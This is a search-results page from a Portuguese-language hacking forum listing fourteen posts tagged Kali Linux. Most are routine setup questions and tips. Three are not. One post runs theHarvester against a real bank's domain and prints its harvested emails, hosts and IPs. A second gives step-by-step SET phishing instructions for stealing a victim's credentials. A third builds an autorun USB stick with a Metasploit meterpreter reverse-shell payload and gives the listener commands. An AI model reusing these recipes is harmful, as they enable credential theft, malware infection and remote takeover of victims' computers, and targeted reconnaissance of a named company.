Jump to content

Search the Community

Showing results for tags 'kali linux'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Fsociety Brasil
    • Administration
    • Sugestões
    • Apresentação de Membros
  • Desenvolvimento
    • Ferramentas
    • Projetos
    • Programação
  • Segurança da Informação
    • Hacker
    • Cracker
    • Leaks
    • Engenharia Social
    • CTF
    • Bug Bounty
  • Sistemas Operacionais (S.O)
    • Linux
    • Windows
    • Mac
  • Hardware
    • Tutoriais e Ferramentas
    • Dúvidas e discussões
    • Arduino
    • Raspberry
  • Off-Topic
    • BioHacking
    • Games, Emuladores, Crack, Cheater e afins
    • Cursos, apostilas e livros
    • Ciência, Tecnologia, Sociologia, Filosofia e Psicologia
    • Notícias, novidades, acontecimentos e teorias da conspiração
    • Design
    • Random, dúvidas e discussões

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Location


Sex

Found 14 results

  1. Tutorial BÁSICO sobre a ferramenta theHarvester [Kali Linux] ******************************************************************* * * * | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ * * | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| * * | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | * * \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| * * * * theHarvester Ver. 3.0.6 * * Coded by Christian Martorella * * Edge-Security Research * * [email protected] * ******************************************************************* theHarvester é uma ferramenta muito simples, mas eficaz, projetada para ser usada no início de estágios de um teste de penetração. Essa ferramenta reúne e-mails, nomes, subdomínios, IPs e URLs usando vários dados públicos. Os motores de busca dessa ferramenta são: baidu, bing, bingapi, censys, crtsh, dogpile, google, google-certificates, googlecse, googleplus, google-profiles, caçador, linkedin, netcraft, pgp, threatcrowd, twitter, vhost, virustotal, yahoo. A ferramenta theHarvester conta as seguintes opções: -d: Domínio para pesquisar ou nome da empresa -b: fonte de dados: baidu, bingapi, bingapi, censys, crtsh, dogpile, google, google-certificates, googlecse, googleplus, google-profiles, caçador, linkedin, netcraft, pgp, threatcrowd, twitter, vhost, virustotal, yahoo, tudo -g: use o Google dorking em vez da pesquisa normal no Google -s: inicia no número de resultado X (padrão: 0) -v: verifica o nome do host por meio da resolução de DNS e procura por hosts virtuais -f: salva os resultados em um arquivo HTML e XML (ambos) -n: executa uma consulta reversa de DNS em todos os intervalos descobertos -c: executa uma força bruta de DNS para o nome de domínio -t: executar uma descoberta de expansão do TLD de DNS -e: use este servidor DNS -p: port varre os hosts detectados e verifique se há Takeovers (80,443,22,21,8080) -l: limita o número de resultados para trabalhar (o Bing passa de 50 para 50 resultados, Google 100 a 100 e o PGP não usa essa opção) -h: use o banco de dados SHODAN para consultar hosts descobertos Pra você reunir as informaçoes sobre a empresa basta seguir os exmplos abaixo: (OBS: o nosso exemplo será a bradesco.com) [email protected]:~# theharvester -d bradesco.com -l 500 -b all Agora uma leve explicação sobre o comando citado acima: -d <domínio para pesquisar> -l <limita o número de resultados para trabalhar> -b <fonte de dados> Logo após a execução do comando citado acima ira aparecer isso: [email protected]:~# theharvester -d bradesco.com -l 500 -b all Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. ******************************************************************* * * * | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ * * | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| * * | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | * * \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| * * * * theHarvester Ver. 3.0.6 * * Coded by Christian Martorella * * Edge-Security Research * * [email protected] * ******************************************************************* found supported engines [-] Starting harvesting process for domain: bradesco.com Full harvest on bradesco.com [-] Searching in Google.. Searching 0 results... Searching 100 results... Searching 200 results... Searching 300 results... Searching 400 results... Searching 500 results... [-] Searching in PGP Key server.. Searching PGP results... [-] Searching in Netcraft server.. Searching Netcraft results.. [-] Searching in ThreatCrowd server.. Searching Threatcrowd results.. [-] Searching in CRTSH server.. Searching https://crt.sh?id=1093112628 Searching https://crt.sh?id=594086613 Searching https://crt.sh?id=181851923 Searching https://crt.sh?id=30562534 Searching https://crt.sh?id=28194046 Searching CRT.sh results.. [-] Searching in Virustotal server.. Searching Virustotal results.. [-] Searching in Bing.. Searching 50 results... Searching 100 results... Searching 150 results... Searching 200 results... Searching 250 results... Searching 300 results... Searching 350 results... Searching 400 results... Searching 450 results... Searching 500 results... [-] Searching in Hunter: Done Searching Results [-] Searching in Google Certificate transparency report.. [-] Searching in Censys: Harvesting results No IP addresses found [+] Emails found: ------------------ [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected]desco.com [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [+] Hosts found in search engines: ------------------------------------ Total hosts: 33 [-] Resolving hostnames IPs... 2Fwww.bradesco.com:empty 3dwww.bradesco.com:empty 7c2Fwww.bradesco.com:empty adc.bradesco.com:200.155.82.1 bram.bradesco.com:200.155.82.52 bsp.bradesco.com:empty bspa.bradesco.com:empty im-access1.bradesco.com:200.155.91.1 im-webcon1.bradesco.com:200.155.91.2 multicanal.bradesco.com:200.155.85.71 portaladm.bradesco.com:200.155.82.142 portaldsps.bradesco.com:200.155.87.213 portalpatrimonio.bradesco.com:200.155.82.238 sip.adc.bradesco.com:empty sip.bradesco.com:200.155.91.1 sip.bram.bradesco.com:200.155.91.1 sip.bsp.bradesco.com:empty sip.bspa.bradesco.com:empty sip.corpr.bradesco.com:empty wap.bradesco.com:200.155.82.51 webaccess.bradesco.com.br:200.155.87.163 webta.bradesco.com:200.155.86.58 wspf.bradesco.com:200.155.82.217 www.bradesco.com:200.155.83.77 www.bram.bradesco.com:200.155.82.52 www.edi.bradesco.com:200.155.84.37 www.ib2.bradesco.com:200.155.82.116 www.ib6.bradesco.com:200.155.82.130 www.icm.bradesco.com:200.155.83.211 www.m.bradesco.com:200.155.82.123 wwws.portaladm.bradesco.com:200.155.86.135 wwwss.bradesco.com:200.155.90.16 Nesse caso utilizando o dominio bradesco.com o theHarvester reuniu Emails, hostnames e IPs sobre a empresa. Caso você queira utilizar o banco de dados SHODAN basta você colocar -h no comando, a seguir um exemplo do uso do SHODAN: [email protected]:~# theharvester -d bradesco.com -l 500 -b all -h Para você salvar os resultados em HTML basta colocar -f <nome_do_arquivo_.html>, a seguir um exemplo do uso do -f: [email protected]:~# theharvester -d bradesco.com -l 500 -b all -h -f resultados.html O documento criado ficaria na 'Pasta Pessoal' [/root] [OBS: Lembrando que estou usando o Kali Linux] Espero ter esclarecido a ferramenta theHarvester para vocês, façam bom uso dessa ferramenta. Espero que tenham gostado!
  2. Meu amigo pediu para eu criar um tópico nesse forum dizendo como colocar o API Key do Hunter.io no theHarvester. Lembrando que será um tutorial bem simples Basta você seguir os seguintes passos e você estará usando o seu API Key do Hunter.io no theHarvester 1- Criar uma conta no Hunter.io 2- Ir para o painel de controle (Dashboard) da sua conta 3- Clicar na opção de API encontrada do lado superior direito do site do Hunter.io 4- Na página que abrirá tera seu API key, nesse momento copie o API Key 5- Você terá que fazer isso manualmente, vá na pasta do computador e abra a pasta 'usr' depois a 'share' depois a 'theharvester' e logo em seguida a 'discovery' nessa pasta terá um arquivo em python chamado 'huntersearch.py' você ira abrir ele como editor, nesse arquivo você tera que encontrar esse linha de codigo: def __init__(self, word, limit, start): self.word = word self.limit = 100 self.start = start self.key = "Ponha_seu_API_KEY_aqui" if self.key == "": print("You need an API key in order to use the Hunter search engine. You can get one here: https://hunter.io") sys.exit() self.results = "" self.totalresults = "" self.counter = start self.database = "https://api.hunter.io/v2/domain-search?domain=" + word + "&api_key=" + self.key +"&limit=" + str(self.limit) 6- Na linha 5 do código você ira colocar seu API Key entre as Aspas duplas. 7- Depois da edição feita, você já pode salvar e fechar esse arquivo. Então quando você for executar o theHarvester ele já ira utilizar a sua conta do Hunter.io (lembrando que sua conta no Hunter.io é FREE e ela tem o limite de 50 'pedidos' por mês).
  3. Gostei muito das distros Kali. Testei a Mate, a original, a KDE.... Porém a que mais gostei foi a E17. Tem um visual show! Mas tenho um problema sério com ela: não consigo conectar a internet. Houve o aviso de que deveria instalar o Connman. Mas como sem internet?! Uso o Kali em dualboot com o Ubuntu, pois só assim consigo pesquisar, estudar, navegar. Agradeço se alguém puder ajudar. Já li vários tópicos, que são raros, mas nada funcionou.
  4. Passo 1: No terminal, digite setoolkit. Passo 2: Na linha SET, coloque o número 1! Passo 3: No próximo processo, opção 2! Passo 4: Próximo processo, opção 3! Passo 5: Próximo processo, opção 2! Passo 6: Pedirá nesse processo o IP da máquina, iremos descobrir dessa forma. Em um novo terminal (sem fechar esse), digite ifconfig: Coloque esse I.P na opção pedida no terminal do setoolkit. Passo 7: Coloque o site desejado! Passo 8: Abra seu navegador - de preferência Mozilla - e coloque seu IP. Se abrir o site, beleza! Se não abrir, verifique seu apache! Abra novo terminal -> service apache2 status -> service apache2 start Passo 9: Abra Google shortlink --> https://goo.gl/. E coloque o IP usado para abrir o "site fake". Com o novo link, envie para a vítima, que ao digitar suas identificações, aparecerá no seu terminal setoolkit. Site fake: Terminal:
  5. Tutorial de como instalar o Kali Linux no Windows 10 via Subsystem + Interface gráfica Link para o video
  6. Iremos construir um pendrive USB U3, de modo que quando conectado a um PC, realize uma conexão reversa com o Meterpreter.A idéia é gerar, com o Metasploit, um arquivo executável com um payload para gerar uma conexão reversa ao conectar o pendrive na USB do PC. Para gravar o payload dentro do U3, usaremos o programa Universal Customizer. Gerar o payload com o Metasploitvamos criar um executável com uma conexão reversa do Meterpreter:msfpayload windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=443 X >malware.exe Criar nossa ISOUma vez que tenhamos baixado o Universal Customizer, copiamos o arquivo malware.exe para o diretório “U3CUSTOM” e criamos o arquivo “autorun.inf” com o seguinte conteúdo:[AutoRun]open=malware.exeApós isso, executamos o “ISOCreate.cmd” e dentro do diretório “BIN” será criada nossa ISO com o nome“U3CUSTOM.ISO”. Se não criarmos nossa ISO , o Universal Customizer utilizará a ISO “U3CUSTOM.ISO” que já vem dentro do pacote, com uma versão feita por Hacksaw. Gravar a ISOIniciamos o Universal Customizer e vamos seguindo os passo:Ao finalizar, retiramos o pendrive, e quando voltarmos a conectá-lo já teremos nosso payload sendo executado.Aguardando a conexmo reversaPara finalizar, devemos deixar o meterpreter “escutando” à espera da conexão reversa que será feita pelo payload gravado no pendrive:./msfconsoleuse exploit/multi/handlerset PAYLOAD windows/meterpreter/reverse_tcpset LHOST 1.1.1.1set LPORT 443set ExitOnSession falseexploit -j É isso pessoal o processo é basicamente a criação de uma backdoor coloca-la no PenDriver e Criar o Arquivo “autorun.inf” colocar o meterpreter em modo escuta e aguardar. By Wheezy ^^
  7. Olá cambada, estou com uma duvida e vou abrir uma discussão. Sou iniciante em Kali, manjo um básico, e gostaria de saber se teria como monitorar dados que estão passando pelo modem e modificar o retorno ao usuário. Gostaria de saber por exemplo em qual servidor algum dispositivo esta conectando ou a que URL esta solicitando, fazer uma escuta na rede. Queria saber também se teria alguma forma de editar dados que estão voltando do "servidor" para o usuário. Tipo um comando diz sim e eu altero para não, de 1 pra 5 etc... Qualquer dica, comentário ou até mesmo só o nome do aplicativo ou script já ajuda. Desde já, vlw a todos que ajudarem!
  8. LIVRO: Kali Linux Network Scanning Cookbook AUTOR: Justin Hutchens ANO: 2014 TAMANHO: 5mb DESCRIÇÃO: DOWNLOAD
  9. Olá membros, estou começando no mundo do Linux (por assim dizer), e tenho umas dúvidas aqui, vamos lá... Eu atualmente utilizo a distro Manjaro, e futuramente, pretendo ir pro Arch de vez, e sei que o Arch tem uma distribuição (ou complementação) voltada para testes de penetração e por ai vai. Eu já utilizei o Kali algumas vezes, e ele é bem de boa, tanto por qual é derivado, que foi até bem mais fácil de mexer na época, e tem muita, muita coisa, sobre ele por ai, e o problema é, estou em dúvida em qual distro usar voltada para segurança, tem tudo sobre o Kali por ai, mas vi que os programas do BlackArch são mais atualizados, e o sistema em si flui melhor... E pensando nisso, não se tem muito sobre as ferramentas presentes na distro do Arch, não pelo que pesquisei, pelo menos. Outro ponto é, quando se pesquisa por cursos/certificação pela net, só se vê: KaliKaliKaliKali... Para quem ainda tá começando, vale ir no Kali e depois pegar no Black, ou não vai ter tanta diferença? Deixem suas opiniões e experiências com cada sistema, vai ajudar bacana o/ É isso ae, vlw!
  10. Pessoal estou com uma dúvida que está coçando a minha cabeça. Eu tenho um pendrive que conecta no pc e no celular, assisti tutoriais mostrando como colocar kali linux no celular, assisti tutoriais de como colocar o kali linux no pendrive para rodar em outro computadores. Aí vem a dúvida... Tem alguma possibilidade de colocar o kali linux no pendrive para rodar no pc e no celular??
  11. Me ajudem Por Favor. Eu uso o Kali Linux por Live USB, e recentemente meu navegador não esta funcionando, quando eu entro pra pesquisar em qualquer site aparece "não foi possível estabelecer conexão segura " e estou conectado a internet. E não é só o navegador, quando vou criar uma backdoor pelo Metasploit da problema na criação. O que posso fazer para arrumar esse problema ?
  12. Muitos tem dúvida de como adicionar som no Kali Linux e é um passo bem simples, digite o código abaixo no seu Terminal e veja a mágica acontecer! Caso você queira desabilitar o som do Kali Linux novamente (provavelmente não mas se quiser...) é apenas digitar o seguinte comando: Se tiver qualquer dúvida não deixe de perguntar nos comentários!!
  13. Boa noite,sou iniciante nessas coisas de hacking e ontem eu baixei o kali linux,quando eu fui abrir o terminal saiu uma mensagem escrita na tela dizendo Erro ao lançar "Terminal" falha no fork(não foi possivel alocar a memória).Queria resolver esse problema
  14. Kali Linux, Linux bem famoso para os pentesters não precisa de introdução. Hoje, vou mostrar como criar um usuário normal com o Kali Linux. Você pode perguntar: Por que alguém quer criar um usuário normal / padrão no Kali? O que há de errado com ter somente o root? Bem, simplesmente dizendo, ser root o tempo todo não é tão bom. Algumas aplicações não funcionam no root. Exemplos: -O Google Chrome não funcionará por padrão. -Sons são desabilitados por padrão. - O navegator Tor não pode ser executado quando logado como root. Se você quiser usar o Kali como um sistema operacional do dia-a-dia, sugiro que você crie um usuário padrão e use-o. Se você quiser fazer suas hacknagens e outras coisas, você pode "sudo" ou apenas fazer login como root(digitando “su”). Nota: Este procedimento pode ser usado em qualquer distro do Linux para adicionar um usuário normal. Isso inclui ubuntu, Mint, ou mesmo Centos. Veja como cirar um normal user(usuário normal). Abra um terminal e digite o seguinte comando: useradd -m username passwd username usermod -a -G sudo username A opção “-a” significa adicionar e “-G sudo” significa adicionar o usuário ao grupo sudo. Se você quiser saber mais sobre o comando “usermod”, digite apenas o comando usermod para saber mais sobre ele. Agora temos que especificar o shell para nosso novo usuário. chsh -s /bin/bash username
×
×
  • Create New...

Important Information

By using this site, you agree to our Terms of Use.